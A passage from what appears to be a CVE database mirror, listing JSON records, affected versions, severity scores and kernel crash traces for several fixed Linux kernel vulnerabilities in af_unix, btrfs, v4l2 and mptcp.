"url": "https://git.kernel.org/stable/c/9aa8773abfa0e954136875b4cbf2df4cf638e8a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8299e4d778f664b31b67cf4cf3d5409de2ecb92c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0688d4e499bee3f2749bca27329bd128686230cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a4c88072abcaca593cefe70f90e9d3707526e8f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a52fa2addfcccc2c5a0217fd45562605088c018b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/540bf24fba16b88c1b3b9353927204b4f1074e25"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38596",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:37.376960Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:54.639Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/unix/af_unix.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fca6072e1a7b1e709ada5604b951513b89b4bd0a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "de6641d213373fbde9bbdd7c4b552254bc9f82fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4d51845d734a4c5d079e56e0916f936a55e15055",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9aa8773abfa0e954136875b4cbf2df4cf638e8a5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8299e4d778f664b31b67cf4cf3d5409de2ecb92c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0688d4e499bee3f2749bca27329bd128686230cb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a4c88072abcaca593cefe70f90e9d3707526e8f9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a52fa2addfcccc2c5a0217fd45562605088c018b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "540bf24fba16b88c1b3b9353927204b4f1074e25",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/unix/af_unix.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data races in unix_release_sock/unix_stream_sendmsg\n\nA data-race condition has been identified in af_unix. In one data path,\nthe write function unix_release_sock() atomically writes to\nsk-\u003esk_shutdown using WRITE_ONCE. However, on the reader side,\nunix_stream_sendmsg() does not read it atomically. Consequently, this\nissue is causing the following KCSAN splat to occur:\n\n\tBUG: KCSAN: data-race in unix_release_sock / unix_stream_sendmsg\n\n\twrite (marked) to 0xffff88867256ddbb of 1 bytes by task 7270 on cpu 28:\n\tunix_release_sock (net/unix/af_unix.c:640)\n\tunix_release (net/unix/af_unix.c:1050)\n\tsock_close (net/socket.c:659 net/socket.c:1421)\n\t__fput (fs/file_table.c:422)\n\t__fput_sync (fs/file_table.c:508)\n\t__se_sys_close (fs/open.c:1559 fs/open.c:1541)\n\t__x64_sys_close (fs/open.c:1541)\n\tx64_sys_call (arch/x86/entry/syscall_64.c:33)\n\tdo_syscall_64 (arch/x86/entry/common.c:?)\n\tentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n\n\tread to 0xffff88867256ddbb of 1 bytes by task 989 on cpu 14:\n\tunix_stream_sendmsg (net/unix/af_unix.c:2273)\n\t__sock_sendmsg (net/socket.c:730 net/socket.c:745)\n\t____sys_sendmsg (net/socket.c:2584)\n\t__sys_sendmmsg (net/socket.c:2638 net/socket.c:2724)\n\t__x64_sys_sendmmsg (net/socket.c:2753 net/socket.c:2750 net/socket.c:2750)\n\tx64_sys_call (arch/x86/entry/syscall_64.c:33)\n\tdo_syscall_64 (arch/x86/entry/common.c:?)\n\tentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n\n\tvalue changed: 0x01 -\u003e 0x03\n\nThe line numbers are related to commit dd5a440a31fa (\"Linux 6.9-rc7\").\n\nCommit e1d09c2c2f57 (\"af_unix: Fix data races around sk-\u003esk_shutdown.\")\naddressed a comparable issue in the past regarding sk-\u003esk_shutdown.\nHowever, it overlooked resolving this particular data path.\nThis patch only offending unix_stream_sendmsg() function, since the\nother reads seem to be protected by unix_state_lock() as discussed in"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:55.180Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fca6072e1a7b1e709ada5604b951513b89b4bd0a"
},
{
"url": "https://git.kernel.org/stable/c/de6641d213373fbde9bbdd7c4b552254bc9f82fe"
},
{
"url": "https://git.kernel.org/stable/c/4d51845d734a4c5d079e56e0916f936a55e15055"
},
{
"url": "https://git.kernel.org/stable/c/9aa8773abfa0e954136875b4cbf2df4cf638e8a5"
},
{
"url": "https://git.kernel.org/stable/c/8299e4d778f664b31b67cf4cf3d5409de2ecb92c"
},
{
"url": "https://git.kernel.org/stable/c/0688d4e499bee3f2749bca27329bd128686230cb"
},
{
"url": "https://git.kernel.org/stable/c/a4c88072abcaca593cefe70f90e9d3707526e8f9"
},
{
"url": "https://git.kernel.org/stable/c/a52fa2addfcccc2c5a0217fd45562605088c018b"
},
{
"url": "https://git.kernel.org/stable/c/540bf24fba16b88c1b3b9353927204b4f1074e25"
}
],
"title": "af_unix: Fix data races in unix_release_sock/unix_stream_sendmsg",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38596",
"datePublished": "2024-06-19T13:45:45.984Z",
"dateReserved": "2024-06-18T19:36:34.931Z",
"dateUpdated": "2025-11-04T17:21:40.772Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-23850 (GCVE-0-2024-23850)
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2025-11-04 18:28
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:28:55.847Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/lkml/CALGdzuo6awWdau3X=8XK547x2vX_-VoFmH1aPsqosRTQ5WzJVA%40mail.gmail.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/all/6a80cb4b32af89787dadee728310e5e2ca85343f.1705741883.git.wqu%40suse.com/"
},
{
"name": "FEDORA-2024-d16d94b00d",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-23850",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-01T19:31:54.610927Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-617",
"description": "CWE-617 Reachable Assertion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-30T20:32:33.766Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:10:25.167Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://lore.kernel.org/lkml/CALGdzuo6awWdau3X=8XK547x2vX_-VoFmH1aPsqosRTQ5WzJVA%40mail.gmail.com/"
},
{
"url": "https://lore.kernel.org/all/6a80cb4b32af89787dadee728310e5e2ca85343f.1705741883.git.wqu%40suse.com/"
},
{
"name": "FEDORA-2024-d16d94b00d",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-23850",
"datePublished": "2024-01-23T00:00:00.000Z",
"dateReserved": "2024-01-23T00:00:00.000Z",
"dateUpdated": "2025-11-04T18:28:55.847Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27077 (GCVE-0-2024-27077)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-mem2mem: fix a memleak in v4l2_m2m_register_entity
The entity->name (i.e. name) is allocated in v4l2_m2m_register_entity
but isn't freed in its following error-handling paths. This patch
adds such deallocation to prevent memleak of entity->name.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b Version: be2fff656322e82f215730839063c2c2ca73d14b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:57.849Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3dd8abb0ed0e0a7c66d6d677c86ccb188cc39333"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0175f2d34c85744f9ad6554f696cf0afb5bd04e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afd2a82fe300032f63f8be5d6cd6981e75f8bbf2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc866b69cc51af9b8509b4731b8ce2a4950cd0ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c9550b032de48d6a7fa6a4ddc09699d64d9300d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90029b9c979b60de5cb2b70ade4bbf61d561bc5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5dc319cc3c4f7b74f7dfba349aa26f87efb52458"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c23ef30e840fedc66948299509f6c2777c9cf4f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f94b49a5b5d386c038e355bef6347298aabd211"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27077",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:43:52.226383Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:29.139Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/v4l2-core/v4l2-mem2mem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3dd8abb0ed0e0a7c66d6d677c86ccb188cc39333",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "0175f2d34c85744f9ad6554f696cf0afb5bd04e4",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "afd2a82fe300032f63f8be5d6cd6981e75f8bbf2",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "dc866b69cc51af9b8509b4731b8ce2a4950cd0ef",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "0c9550b032de48d6a7fa6a4ddc09699d64d9300d",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "90029b9c979b60de5cb2b70ade4bbf61d561bc5d",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "5dc319cc3c4f7b74f7dfba349aa26f87efb52458",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "9c23ef30e840fedc66948299509f6c2777c9cf4f",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
},
{
"lessThan": "8f94b49a5b5d386c038e355bef6347298aabd211",
"status": "affected",
"version": "be2fff656322e82f215730839063c2c2ca73d14b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/v4l2-core/v4l2-mem2mem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: v4l2-mem2mem: fix a memleak in v4l2_m2m_register_entity\n\nThe entity-\u003ename (i.e. name) is allocated in v4l2_m2m_register_entity\nbut isn\u0027t freed in its following error-handling paths. This patch\nadds such deallocation to prevent memleak of entity-\u003ename."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:48.825Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3dd8abb0ed0e0a7c66d6d677c86ccb188cc39333"
},
{
"url": "https://git.kernel.org/stable/c/0175f2d34c85744f9ad6554f696cf0afb5bd04e4"
},
{
"url": "https://git.kernel.org/stable/c/afd2a82fe300032f63f8be5d6cd6981e75f8bbf2"
},
{
"url": "https://git.kernel.org/stable/c/dc866b69cc51af9b8509b4731b8ce2a4950cd0ef"
},
{
"url": "https://git.kernel.org/stable/c/0c9550b032de48d6a7fa6a4ddc09699d64d9300d"
},
{
"url": "https://git.kernel.org/stable/c/90029b9c979b60de5cb2b70ade4bbf61d561bc5d"
},
{
"url": "https://git.kernel.org/stable/c/5dc319cc3c4f7b74f7dfba349aa26f87efb52458"
},
{
"url": "https://git.kernel.org/stable/c/9c23ef30e840fedc66948299509f6c2777c9cf4f"
},
{
"url": "https://git.kernel.org/stable/c/8f94b49a5b5d386c038e355bef6347298aabd211"
}
],
"title": "media: v4l2-mem2mem: fix a memleak in v4l2_m2m_register_entity",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27077",
"datePublished": "2024-05-01T13:04:51.518Z",
"dateReserved": "2024-02-19T14:20:24.217Z",
"dateUpdated": "2025-05-04T09:03:48.825Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36889 (GCVE-0-2024-36889)
Vulnerability from cvelistv5
Published
2024-05-30 15:28
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mptcp: ensure snd_nxt is properly initialized on connect
Christoph reported a splat hinting at a corrupted snd_una:
WARNING: CPU: 1 PID: 38 at net/mptcp/protocol.c:1005 __mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005
Modules linked in:
CPU: 1 PID: 38 Comm: kworker/1:1 Not tainted 6.9.0-rc1-gbbeac67456c9 #59
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014
Workqueue: events mptcp_worker
RIP: 0010:__mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005
Code: be 06 01 00 00 bf 06 01 00 00 e8 a8 12 e7 fe e9 00 fe ff ff e8
8e 1a e7 fe 0f b7 ab 3e 02 00 00 e9 d3 fd ff ff e8 7d 1a e7 fe
<0f> 0b 4c 8b bb e0 05 00 00 e9 74 fc ff ff e8 6a 1a e7 fe 0f 0b e9
RSP: 0018:ffffc9000013fd48 EFLAGS: 00010293
RAX: 0000000000000000 RBX: ffff8881029bd280 RCX: ffffffff82382fe4
RDX: ffff8881003cbd00 RSI: ffffffff823833c3 RDI: 0000000000000001
RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: fefefefefefefeff R12: ffff888138ba8000
R13: 0000000000000106 R14: ffff8881029bd908 R15: ffff888126560000
FS: 0000000000000000(0000) GS:ffff88813bd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f604a5dae38 CR3: 0000000101dac002 CR4: 0000000000170ef0
Call Trace:
<TASK>
__mptcp_clean_una_wakeup net/mptcp/protocol.c:1055 [inline]
mptcp_clean_una_wakeup net/mptcp/protocol.c:1062 [inline]
__mptcp_retrans+0x7f/0x7e0 net/mptcp/protocol.c:2615
mptcp_worker+0x434/0x740 net/mptcp/protocol.c:2767
process_one_work+0x1e0/0x560 kernel/workqueue.c:3254
process_scheduled_works kernel/workqueue.c:3335 [inline]
worker_thread+0x3c7/0x640 kernel/workqueue.c:3416
kthread+0x121/0x170 kernel/kthread.c:388
ret_from_fork+0x44/0x50 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243
</TASK>
When fallback to TCP happens early on a client socket, snd_nxt
is not yet initialized and any incoming ack will copy such value
into snd_una. If the mptcp worker (dumbly) tries mptcp-level
re-injection after such ack, that would unconditionally trigger a send
buffer cleanup using 'bad' snd_una values.
We could easily disable re-injection for fallback sockets, but such
dumb behavior already helped catching a few subtle issues and a very
low to zero impact in practice.
Instead address the issue always initializing snd_nxt (and write_seq,
for consistency) at connect time.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8fd738049ac3d67a937d36577763b47180aae1ad Version: 8fd738049ac3d67a937d36577763b47180aae1ad Version: 8fd738049ac3d67a937d36577763b47180aae1ad Version: 8fd738049ac3d67a937d36577763b47180aae1ad Version: 8fd738049ac3d67a937d36577763b47180aae1ad Version: 8fd738049ac3d67a937d36577763b47180aae1ad |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36889",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:29:56.745706Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:33:02.390Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:49.113Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99951b62bf20cec9247f633a3bea898338b9e5b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc941fec0719d0471a5902424d6b2a17df233193"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39ca83ed73db9edcc6d70c0dc7a73085a4725012"
},
{
"tags": [
"x_transferred"
],
